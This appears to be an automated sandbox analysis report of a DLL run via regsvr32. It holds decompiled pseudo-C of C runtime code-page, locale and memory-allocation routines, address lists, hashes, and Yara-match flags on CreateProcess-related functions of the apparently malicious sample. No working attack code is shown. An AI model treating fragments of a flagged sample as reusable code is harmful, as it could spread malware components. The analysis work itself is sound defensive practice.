                                                                                                                                            				 *((char*)(_a8 + _t226 + 0x11d)) =  *(_t233 + _t223 + 0x360) & 0x000000ff;
                                                                                                                                            				goto 0x65cfa8fc;
                                                                                                                                            				 *((char*)(_a8 + _t223 + 0x11d)) = 0;
                                                                                                                                            				goto L1;
                                                                                                                                            				goto 0x65cfaa20;
                                                                                                                                            				_v56 = 0;
                                                                                                                                            				_v56 = _v56 + 1;
                                                                                                                                            				_v56 = _v56 + 1;
                                                                                                                                            				if (_v56 - 0x100 >= 0) goto 0x65cfaa20;
                                                                                                                                            				if (_v56 - 0x41 < 0) goto 0x65cfa99c;
                                                                                                                                            				if (_v56 - 0x5a > 0) goto 0x65cfa99c;
                                                                                                                                            				_v56 = _v56 + 1;
                                                                                                                                            				__rcx = _a8;
                                                                                                                                            				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000010;
                                                                                                                                            				_v56 = _v56 + 1;
                                                                                                                                            				__rdx = _a8;
                                                                                                                                            				 *((char*)(_a8 + __rcx + 0x1c)) = __al;
                                                                                                                                            				_v56 = _v56 + 0x20;
                                                                                                                                            				__ecx = _v56;
                                                                                                                                            				__rdx = _a8;
                                                                                                                                            				 *((char*)(_a8 + __rcx + 0x11d)) = __al;
                                                                                                                                            				goto 0x65cfaa1b;
                                                                                                                                            				if (_v56 - 0x61 < 0) goto 0x65cfaa04;
                                                                                                                                            				if (_v56 - 0x7a > 0) goto 0x65cfaa04;
                                                                                                                                            				_v56 = _v56 + 1;
                                                                                                                                            				__rcx = _a8;
                                                                                                                                            				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000020;
                                                                                                                                            				_v56 = _v56 + 1;
                                                                                                                                            				__rdx = _a8;
                                                                                                                                            				 *((char*)(_a8 + __rcx + 0x1c)) = __al;
                                                                                                                                            				_v56 = _v56 - 0x20;
                                                                                                                                            				__ecx = _v56;
                                                                                                                                            				__rdx = _a8;
                                                                                                                                            				 *((char*)(__rdx + __rcx + 0x11d)) = __al;
                                                                                                                                            				goto 0x65cfaa1b;
                                                                                                                                            				__eax = _v56;
                                                                                                                                            				__rcx = _a8;
                                                                                                                                            				 *((char*)(_a8 + __rax + 0x11d)) = 0;
                                                                                                                                            				goto L2;
                                                                                                                                            				__rcx = _v24;
                                                                                                                                            				__rcx = _v24 ^ __rsp;
                                                                                                                                            				return E00007FFC7FFC65CF3280(_v56, _v56, __edx, _v24 ^ __rsp, __rdx, __r8);
                                                                                                                                            			}























                                                                                                                                            0x7ffc65cfa5e0
                                                                                                                                            0x7ffc65cfa5e0
                                                                                                                                            0x7ffc65cfa5ec
                                                                                                                                            0x7ffc65cfa5f6
                                                                                                                                            0x7ffc65cfa619
                                                                                                                                            0x7ffc65cfa61f
                                                                                                                                            0x7ffc65cfa62a
                                                                                                                                            0x7ffc65cfa635
                                                                                                                                            0x7ffc65cfa647
                                                                                                                                            0x7ffc65cfa658
                                                                                                                                            0x7ffc65cfa65f
                                                                                                                                            0x7ffc65cfa661
                                                                                                                                            0x7ffc65cfa671
                                                                                                                                            0x7ffc65cfa679
                                                                                                                                            0x7ffc65cfa687
                                                                                                                                            0x7ffc65cfa69c
                                                                                                                                            0x7ffc65cfa6a9
                                                                                                                                            0x7ffc65cfa6b0
                                                                                                                                            0x7ffc65cfa6bb
                                                                                                                                            0x7ffc65cfa6c2
                                                                                                                                            0x7ffc65cfa6d5
                                                                                                                                            0x7ffc65cfa6de
                                                                                                                                            0x7ffc65cfa6e6
                                                                                                                                            0x7ffc65cfa6e8
                                                                                                                                            0x7ffc65cfa6ea
                                                                                                                                            0x7ffc65cfa6fd
                                                                                                                                            0x7ffc65cfa70c
                                                                                                                                            0x7ffc65cfa715
                                                                                                                                            0x7ffc65cfa71a
                                                                                                                                            0x7ffc65cfa72f
                                                                                                                                            0x7ffc65cfa734
                                                                                                                                            0x7ffc65cfa747
                                                                                                                                            0x7ffc65cfa74b
                                                                                                                                            0x7ffc65cfa75b
                                                                                                                                            0x7ffc65cfa760
                                                                                                                                            0x7ffc65cfa770
                                                                                                                                            0x7ffc65cfa783
                                                                                                                                            0x7ffc65cfa788
                                                                                                                                            0x7ffc65cfa79b
                                                                                                                                            0x7ffc65cfa79f
                                                                                                                                            0x7ffc65cfa7af
                                                                                                                                            0x7ffc65cfa7b4
                                                                                                                                            0x7ffc65cfa7c4
                                                                                                                                            0x7ffc65cfa7ca
                                                                                                                                            0x7ffc65cfa7d7
                                                                                                                                            0x7ffc65cfa7dc
                                                                                                                                            0x7ffc65cfa7f2
                                                                                                                                            0x7ffc65cfa804
                                                                                                                                            0x7ffc65cfa81b
                                                                                                                                            0x7ffc65cfa828
                                                                                                                                            0x7ffc65cfa84b
                                                                                                                                            0x7ffc65cfa86d
                                                                                                                                            0x7ffc65cfa874
                                                                                                                                            0x7ffc65cfa88a
                                                                                                                                            0x7ffc65cfa897
                                                                                                                                            0x7ffc65cfa8ba
                                                                                                                                            0x7ffc65cfa8dc
                                                                                                                                            0x7ffc65cfa8e3
                                                                                                                                            0x7ffc65cfa8f4
                                                                                                                                            0x7ffc65cfa8fc
                                                                                                                                            0x7ffc65cfa901
                                                                                                                                            0x7ffc65cfa906
                                                                                                                                            0x7ffc65cfa91a
                                                                                                                                            0x7ffc65cfa91c
                                                                                                                                            0x7ffc65cfa92e
                                                                                                                                            0x7ffc65cfa93c
                                                                                                                                            0x7ffc65cfa946
                                                                                                                                            0x7ffc65cfa94f
                                                                                                                                            0x7ffc65cfa953
                                                                                                                                            0x7ffc65cfa960
                                                                                                                                            0x7ffc65cfa96a
                                                                                                                                            0x7ffc65cfa96e
                                                                                                                                            0x7ffc65cfa976
                                                                                                                                            0x7ffc65cfa981
                                                                                                                                            0x7ffc65cfa984
                                                                                                                                            0x7ffc65cfa98b
                                                                                                                                            0x7ffc65cfa993
                                                                                                                                            0x7ffc65cfa99a
                                                                                                                                            0x7ffc65cfa9a4
                                                                                                                                            0x7ffc65cfa9ae
                                                                                                                                            0x7ffc65cfa9b7
                                                                                                                                            0x7ffc65cfa9bb
                                                                                                                                            0x7ffc65cfa9c8
                                                                                                                                            0x7ffc65cfa9d2
                                                                                                                                            0x7ffc65cfa9d6
                                                                                                                                            0x7ffc65cfa9de
                                                                                                                                            0x7ffc65cfa9e9
                                                                                                                                            0x7ffc65cfa9ec
                                                                                                                                            0x7ffc65cfa9f3
                                                                                                                                            0x7ffc65cfa9fb
                                                                                                                                            0x7ffc65cfaa02
                                                                                                                                            0x7ffc65cfaa04
                                                                                                                                            0x7ffc65cfaa0b
                                                                                                                                            0x7ffc65cfaa13
                                                                                                                                            0x7ffc65cfaa1b
                                                                                                                                            0x7ffc65cfaa20
                                                                                                                                            0x7ffc65cfaa28
                                                                                                                                            0x7ffc65cfaa37

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Info
                                                                                                                                            • String ID: $z
                                                                                                                                            • API String ID: 1807457897-2251613814
                                                                                                                                            • Opcode ID: 939841bcdfd8ad812f8c29de7d09562b703ae5a82c5ff0fab969d8d2fb6d5a5e
                                                                                                                                            • Instruction ID: 3ba343fde87d32b81921f93f209dfdd21190bf1d75421faf274462cf7fde3066
                                                                                                                                            • Opcode Fuzzy Hash: 939841bcdfd8ad812f8c29de7d09562b703ae5a82c5ff0fab969d8d2fb6d5a5e
                                                                                                                                            • Instruction Fuzzy Hash: 84B1F87261CAC4DAD7748B29F8803ABB7A0F788B85F145525DACD83B88DB2DD542DF10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale_unlock$UpdateUpdate::~___updatetmbcinfo
                                                                                                                                            • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbctype.c
                                                                                                                                            • API String ID: 4112623284-4095683531
                                                                                                                                            • Opcode ID: 8356b35877ad84119bda948381768e140a73398435746945450b774d02776550
                                                                                                                                            • Instruction ID: ab248de6c177be1f9b6ee2698b43c6a190cb5b029f08074798f0e588a042e3e6
                                                                                                                                            • Opcode Fuzzy Hash: 8356b35877ad84119bda948381768e140a73398435746945450b774d02776550
                                                                                                                                            • Instruction Fuzzy Hash: E1911A3660C699D6EB608F15E48036A77A0FB88B94F644635EA8E437A8CF3DD545CB10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                            			E00007FFC7FFC65CF461B(void* __rdx, void* __r8, long long _a32, long long _a40, intOrPtr _a64, long long _a72, void* _a80, intOrPtr _a88, long long _a96, long long _a128, signed int _a136, long long _a144, intOrPtr _a152, void* _a160) {
                                                                                                                                            				signed int _t64;
                                                                                                                                            				intOrPtr _t66;
                                                                                                                                            				void* _t73;
                                                                                                                                            				void* _t92;
                                                                                                                                            				long long _t98;
                                                                                                                                            				long long _t113;
                                                                                                                                            				long long _t114;
                                                                                                                                            				long long _t115;
                                                                                                                                            				long long _t130;
                                                                                                                                            				intOrPtr _t132;
                                                                                                                                            				long long _t135;
                                                                                                                                            
                                                                                                                                            				if (_a136 == 1) goto 0x65cf4672;
                                                                                                                                            				_t64 = _a136 & 0x0000ffff;
                                                                                                                                            				if (_t64 == 2) goto 0x65cf4672;
                                                                                                                                            				if (_a136 == 3) goto 0x65cf4672;
                                                                                                                                            				_a40 = "Error: memory allocation: bad memory block type.\n";
                                                                                                                                            				_a32 = "%s";
                                                                                                                                            				r9d = 0;
                                                                                                                                            				r8d = 0;
                                                                                                                                            				0x65cfad00();
                                                                                                                                            				if (_t64 != 1) goto 0x65cf4672;
                                                                                                                                            				asm("int3");
                                                                                                                                            				_t98 = _a128 + 0x34;
                                                                                                                                            				_a96 = _t98;
                                                                                                                                            				0x65cfac90(); // executed
                                                                                                                                            				_a80 = _t98;
                                                                                                                                            				if (_a80 != 0) goto 0x65cf46b8;
                                                                                                                                            				if (_a160 == 0) goto 0x65cf46b3;
                                                                                                                                            				 *_a160 = 0xc;
                                                                                                                                            				goto 0x65cf48b4;
                                                                                                                                            				_t66 =  *0x65d1b03c; // 0x37
                                                                                                                                            				 *0x65d1b03c = _t66 + 1;
                                                                                                                                            				if (_a64 == 0) goto 0x65cf472d;
                                                                                                                                            				 *_a80 = 0;
                                                                                                                                            				 *((long long*)(_a80 + 8)) = 0;
                                                                                                                                            				 *((long long*)(_a80 + 0x10)) = 0;
                                                                                                                                            				 *((intOrPtr*)(_a80 + 0x18)) = 0xfedcbabc;
                                                                                                                                            				 *((long long*)(_a80 + 0x20)) = _a128;
                                                                                                                                            				 *(_a80 + 0x1c) = 3;
                                                                                                                                            				 *((intOrPtr*)(_a80 + 0x28)) = 0;
                                                                                                                                            				goto 0x65cf4844;
                                                                                                                                            				if (0xffffffff -  *0x65d1c960 - _a128 <= 0) goto 0x65cf4763;
                                                                                                                                            				_t130 =  *0x65d1c960; // 0x444b
                                                                                                                                            				 *0x65d1c960 = _t130 + _a128;
                                                                                                                                            				goto 0x65cf476e;
                                                                                                                                            				 *0x65d1c960 = 0xffffffff;
                                                                                                                                            				_t132 =  *0x65d1c990; // 0xaca
                                                                                                                                            				 *0x65d1c990 = _t132 + _a128;
                                                                                                                                            				_t113 =  *0x65d1c978; // 0x33b2
                                                                                                                                            				_t92 =  *0x65d1c990 - _t113; // 0xaca
                                                                                                                                            				if (_t92 <= 0) goto 0x65cf47a8;
                                                                                                                                            				_t114 =  *0x65d1c990; // 0xaca
                                                                                                                                            				 *0x65d1c978 = _t114;
                                                                                                                                            				if ( *0x65d1c980 == 0) goto 0x65cf47c4;
                                                                                                                                            				_t115 =  *0x65d1c980; // 0x2970b50
                                                                                                                                            				 *((long long*)(_t115 + 8)) = _a80;
                                                                                                                                            				goto 0x65cf47d0;
                                                                                                                                            				 *0x65d1c968 = _a80;
                                                                                                                                            				_t135 =  *0x65d1c980; // 0x2970b50
                                                                                                                                            				 *_a80 = _t135;
                                                                                                                                            				 *((long long*)(_a80 + 8)) = 0;
                                                                                                                                            				 *((long long*)(_a80 + 0x10)) = _a144;
                                                                                                                                            				 *((intOrPtr*)(_a80 + 0x18)) = _a152;
                                                                                                                                            				 *((long long*)(_a80 + 0x20)) = _a128;
                                                                                                                                            				 *(_a80 + 0x1c) = _a136;
                                                                                                                                            				_t78 = _a88;
                                                                                                                                            				 *((intOrPtr*)(_a80 + 0x28)) = _a88;
                                                                                                                                            				 *0x65d1c980 = _a80;
                                                                                                                                            				r8d = 4;
                                                                                                                                            				E00007FFC7FFC65CF32B0( *0x65d1b04c & 0x000000ff, _a88,  *0x65d1b04c & 0x000000ff, _a80 + 0x2c, __rdx, __r8);
                                                                                                                                            				_t145 = _a128;
                                                                                                                                            				r8d = 4;
                                                                                                                                            				E00007FFC7FFC65CF32B0( *0x65d1b04c & 0x000000ff, _a88,  *0x65d1b04c & 0x000000ff, _a80 + _a128 + 0x30, _a128, __r8);
                                                                                                                                            				_t73 = E00007FFC7FFC65CF32B0( *0x65d1b04f & 0x000000ff, _t78,  *0x65d1b04f & 0x000000ff, _a80 + 0x30, _t145, _a128);
                                                                                                                                            				_a72 = _a80 + 0x30;
                                                                                                                                            				return E00007FFC7FFC65CF9360(_t73, 4);
                                                                                                                                            			}














                                                                                                                                            0x7ffc65cf4623
                                                                                                                                            0x7ffc65cf462c
                                                                                                                                            0x7ffc65cf4634
                                                                                                                                            0x7ffc65cf463e
                                                                                                                                            0x7ffc65cf4647
                                                                                                                                            0x7ffc65cf4653
                                                                                                                                            0x7ffc65cf4658
                                                                                                                                            0x7ffc65cf465b
                                                                                                                                            0x7ffc65cf4665
                                                                                                                                            0x7ffc65cf466d
                                                                                                                                            0x7ffc65cf466f
                                                                                                                                            0x7ffc65cf467a
                                                                                                                                            0x7ffc65cf467e
                                                                                                                                            0x7ffc65cf4688
                                                                                                                                            0x7ffc65cf468d
                                                                                                                                            0x7ffc65cf4698
                                                                                                                                            0x7ffc65cf46a3
                                                                                                                                            0x7ffc65cf46ad
                                                                                                                                            0x7ffc65cf46b3
                                                                                                                                            0x7ffc65cf46b8
                                                                                                                                            0x7ffc65cf46c0
                                                                                                                                            0x7ffc65cf46cb
                                                                                                                                            0x7ffc65cf46d2
                                                                                                                                            0x7ffc65cf46de
                                                                                                                                            0x7ffc65cf46eb
                                                                                                                                            0x7ffc65cf46f8
                                                                                                                                            0x7ffc65cf470c
                                                                                                                                            0x7ffc65cf4715
                                                                                                                                            0x7ffc65cf4721
                                                                                                                                            0x7ffc65cf4728
                                                                                                                                            0x7ffc65cf4743
                                                                                                                                            0x7ffc65cf474d
                                                                                                                                            0x7ffc65cf475a
                                                                                                                                            0x7ffc65cf4761
                                                                                                                                            0x7ffc65cf4763
                                                                                                                                            0x7ffc65cf4776
                                                                                                                                            0x7ffc65cf4783
                                                                                                                                            0x7ffc65cf478a
                                                                                                                                            0x7ffc65cf4791
                                                                                                                                            0x7ffc65cf4798
                                                                                                                                            0x7ffc65cf479a
                                                                                                                                            0x7ffc65cf47a1
                                                                                                                                            0x7ffc65cf47b0
                                                                                                                                            0x7ffc65cf47b2
                                                                                                                                            0x7ffc65cf47be
                                                                                                                                            0x7ffc65cf47c2
                                                                                                                                            0x7ffc65cf47c9
                                                                                                                                            0x7ffc65cf47d5
                                                                                                                                            0x7ffc65cf47dc
                                                                                                                                            0x7ffc65cf47e4
                                                                                                                                            0x7ffc65cf47f9
                                                                                                                                            0x7ffc65cf4809
                                                                                                                                            0x7ffc65cf4819
                                                                                                                                            0x7ffc65cf4829
                                                                                                                                            0x7ffc65cf4831
                                                                                                                                            0x7ffc65cf4835
                                                                                                                                            0x7ffc65cf483d
                                                                                                                                            0x7ffc65cf4854
                                                                                                                                            0x7ffc65cf485c
                                                                                                                                            0x7ffc65cf486d
                                                                                                                                            0x7ffc65cf487a
                                                                                                                                            0x7ffc65cf4882
                                                                                                                                            0x7ffc65cf48a1
                                                                                                                                            0x7ffc65cf48af
                                                                                                                                            0x7ffc65cf48c7

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _unlock
                                                                                                                                            • String ID: Error: memory allocation: bad memory block type.
                                                                                                                                            • API String ID: 2480363372-1537269110
                                                                                                                                            • Opcode ID: 0e27953d906dd6213389af50a7459ab3260dce137a7056963e47b3559a26f049
                                                                                                                                            • Instruction ID: 6415da370f476eeaead4fd3553d81ed1de4b05f72368386765beeb1233d5b79d
                                                                                                                                            • Opcode Fuzzy Hash: 0e27953d906dd6213389af50a7459ab3260dce137a7056963e47b3559a26f049
                                                                                                                                            • Instruction Fuzzy Hash: 5D71FC36A0DB99C6E7248F55E590329B7A0FB89F54F204936DA9D437A4CF7DD044CB10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateProcess
                                                                                                                                            • String ID: z
                                                                                                                                            • API String ID: 963392458-1375040831
                                                                                                                                            • Opcode ID: 044b6e1ce48cfd18270e48a4d1ffa5fa37b68dcc1aa27e33fe08f1a26b59e50a
                                                                                                                                            • Instruction ID: 5490f85ef4092ec497088e60b932e525f0ce693db587fe3a551d92928695aba5
                                                                                                                                            • Opcode Fuzzy Hash: 044b6e1ce48cfd18270e48a4d1ffa5fa37b68dcc1aa27e33fe08f1a26b59e50a
                                                                                                                                            • Instruction Fuzzy Hash: 5141C27191C7848FD7A5DF18D08A7DAB7E0FB98318F01495DE88CC7292DB749885CB46
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateProcess
                                                                                                                                            • String ID: z
                                                                                                                                            • API String ID: 963392458-1375040831
                                                                                                                                            • Opcode ID: 274a6825be770f02a4f82c9f6cbe831b28a77f7637ef6bb2e3a1323e28db6850
                                                                                                                                            • Instruction ID: 90d0215384d3738c1bd812602d16852eefab8a4974bd8bae5625081230a7a3ff
                                                                                                                                            • Opcode Fuzzy Hash: 274a6825be770f02a4f82c9f6cbe831b28a77f7637ef6bb2e3a1323e28db6850
                                                                                                                                            • Instruction Fuzzy Hash: 4741377091CB848BD7B4DF18D08A7AAB7E0FB98315F10495EE88CC3252DB7498848B86
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EncodePointer_initterm_e
                                                                                                                                            • String ID: Y
                                                                                                                                            • API String ID: 1618838664-1754117475
                                                                                                                                            • Opcode ID: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                                                                                                                            • Instruction ID: b5965a8c6d5b525975ce95c358e56127c7ea253e70c197aefcb53a1febc8e983
                                                                                                                                            • Opcode Fuzzy Hash: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                                                                                                                            • Instruction Fuzzy Hash: 4FE0C922A1C06BE6F625AF20E9445BD23A0FF98B48F600931E14D468E5DF2EE904DB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 47%
                                                                                                                                            			E00007FFC7FFC65CFA000(signed short __ecx, void* __rcx, long long __rdx, signed int _a8, void* _a16) {
                                                                                                                                            				signed int _v24;
                                                                                                                                            				signed char* _v32;
                                                                                                                                            				char _v50;
                                                                                                                                            				char _v56;
                                                                                                                                            				signed int _v72;
                                                                                                                                            				signed char* _v80;
                                                                                                                                            				signed int _v84;
                                                                                                                                            				signed int _v88;
                                                                                                                                            				signed long long _t204;
                                                                                                                                            				signed long long _t205;
                                                                                                                                            				signed long long _t206;
                                                                                                                                            				signed char* _t215;
                                                                                                                                            				signed long long _t218;
                                                                                                                                            				signed long long _t233;
                                                                                                                                            				signed long long _t234;
                                                                                                                                            
                                                                                                                                            				_a16 = __rdx;
                                                                                                                                            				_a8 = __ecx;
                                                                                                                                            				_t204 =  *0x65d1b018; // 0x6e969b7d650c
                                                                                                                                            				_t205 = _t204 ^ _t234;
                                                                                                                                            				_v24 = _t205;
                                                                                                                                            				_a8 = E00007FFC7FFC65CF9F20(_a8, _t205);
                                                                                                                                            				if (_a8 != 0) goto 0x65cfa04d;
                                                                                                                                            				E00007FFC7FFC65CFA4E0(_a16);
                                                                                                                                            				goto 0x65cfa463;
                                                                                                                                            				_v84 = 0;
                                                                                                                                            				_v84 = _v84 + 1;
                                                                                                                                            				if (_t205 - 5 >= 0) goto 0x65cfa239;
                                                                                                                                            				_t206 = _t205 * 0x30;
                                                                                                                                            				if ( *((intOrPtr*)(0x65d1bb70 + _t206)) != _a8) goto 0x65cfa234;
                                                                                                                                            				_v72 = 0;
                                                                                                                                            				goto 0x65cfa0a2;
                                                                                                                                            				_v72 = _v72 + 1;
                                                                                                                                            				if (_v72 - 0x101 >= 0) goto 0x65cfa0bf;
                                                                                                                                            				 *((char*)(_a16 + _t206 + 0x1c)) = 0;
                                                                                                                                            				goto 0x65cfa098;
                                                                                                                                            				_v88 = 0;
                                                                                                                                            				goto 0x65cfa0d3;
                                                                                                                                            				_v88 = _v88 + 1;
                                                                                                                                            				if (_v88 - 4 >= 0) goto 0x65cfa197;
                                                                                                                                            				_v80 = 0x47fdf945f9700;
                                                                                                                                            				goto 0x65cfa111;
                                                                                                                                            				_v80 =  &(_v80[2]);
                                                                                                                                            				if (( *_v80 & 0x000000ff) == 0) goto 0x65cfa192;
                                                                                                                                            				if ((_v80[1] & 0x000000ff) == 0) goto 0x65cfa192;
                                                                                                                                            				_v72 =  *_v80 & 0x000000ff;
                                                                                                                                            				goto 0x65cfa142;
                                                                                                                                            				_v72 = _v72 + 1;
                                                                                                                                            				_t215 = _v80;
                                                                                                                                            				if (_v72 - ( *(_t215 + 1) & 0x000000ff) > 0) goto 0x65cfa18d;
                                                                                                                                            				_t233 = _a16;
                                                                                                                                            				 *((char*)(_t233 + 0x65d1bb70 + _t206 * 0x30 + 0x1c)) =  *(_a16 + _t215 + 0x1c) & 0x000000ff |  *0xFFF8CBA376D8;
                                                                                                                                            				goto 0x65cfa138;
                                                                                                                                            				goto 0x65cfa103;
                                                                                                                                            				goto 0x65cfa0c9;
                                                                                                                                            				 *(_a16 + 4) = _a8;
                                                                                                                                            				 *((intOrPtr*)(_a16 + 8)) = 1;
                                                                                                                                            				_t218 = _a16;
                                                                                                                                            				 *(_a16 + 0xc) = E00007FFC7FFC65CFA480( *((intOrPtr*)(_t218 + 4)));
                                                                                                                                            				_v88 = 0;
                                                                                                                                            				goto 0x65cfa1e7;
                                                                                                                                            				_v88 = _v88 + 1;
                                                                                                                                            				if (_v88 - 6 >= 0) goto 0x65cfa220;
                                                                                                                                            				_t205 = 0x65d1bb70;
                                                                                                                                            				 *((short*)(_a16 + 0x10 + _t233 * 2)) =  *(0x65d1bb70 + 4 + (0x65d1bb70 + _t218 * 0x30) * 2) & 0x0000ffff;
                                                                                                                                            				goto 0x65cfa1dd;
                                                                                                                                            				E00007FFC7FFC65CFA5E0(_a16);
                                                                                                                                            				goto 0x65cfa463;
                                                                                                                                            				goto L1;
                                                                                                                                            				if (_a8 == 0) goto 0x65cfa271;
                                                                                                                                            				if (_a8 == 0xfde8) goto 0x65cfa271;
                                                                                                                                            				if (_a8 == 0xfde9) goto 0x65cfa271;
                                                                                                                                            				__eax = _a8 & 0x0000ffff;
                                                                                                                                            				__ecx = _a8 & 0x0000ffff;
                                                                                                                                            				if (IsValidCodePage(??) != 0) goto 0x65cfa27b;
                                                                                                                                            				__eax = 0xffffffff;
                                                                                                                                            				goto 0x65cfa463;
                                                                                                                                            				__rdx =  &_v56;
                                                                                                                                            				__ecx = _a8;
                                                                                                                                            				if (GetCPInfo(??, ??) == 0) goto 0x65cfa444;
                                                                                                                                            				_v72 = 0;
                                                                                                                                            				goto 0x65cfa2a9;
                                                                                                                                            				_v72 = _v72 + 1;
                                                                                                                                            				_v72 = _v72 + 1;
                                                                                                                                            				if (_v72 - 0x101 >= 0) goto 0x65cfa2c6;
                                                                                                                                            				__eax = _v72;
                                                                                                                                            				__rcx = _a16;
                                                                                                                                            				 *((char*)(_a16 + __rax + 0x1c)) = 0;
                                                                                                                                            				goto 0x65cfa29f;
                                                                                                                                            				__rax = _a16;
                                                                                                                                            				__ecx = _a8;
                                                                                                                                            				 *(_a16 + 4) = _a8;
                                                                                                                                            				__rax = _a16;
                                                                                                                                            				 *(_a16 + 0xc) = 0;
                                                                                                                                            				if (_v56 - 1 <= 0) goto 0x65cfa3f4;
                                                                                                                                            				__rax =  &_v50;
                                                                                                                                            				_v32 =  &_v50;
                                                                                                                                            				goto 0x65cfa30c;
                                                                                                                                            				_v32 =  &(_v32[2]);
                                                                                                                                            				_v32 =  &(_v32[2]);
                                                                                                                                            				__rax = _v32;
                                                                                                                                            				__eax =  *_v32 & 0x000000ff;
                                                                                                                                            				if (( *_v32 & 0x000000ff) == 0) goto 0x65cfa37c;
                                                                                                                                            				__rax = _v32;
                                                                                                                                            				__eax =  *(__rax + 1) & 0x000000ff;
                                                                                                                                            				if (( *(__rax + 1) & 0x000000ff) == 0) goto 0x65cfa37c;
                                                                                                                                            				__rax = _v32;
                                                                                                                                            				__eax =  *_v32 & 0x000000ff;
                                                                                                                                            				_v72 =  *_v32 & 0x000000ff;
                                                                                                                                            				goto 0x65cfa33d;
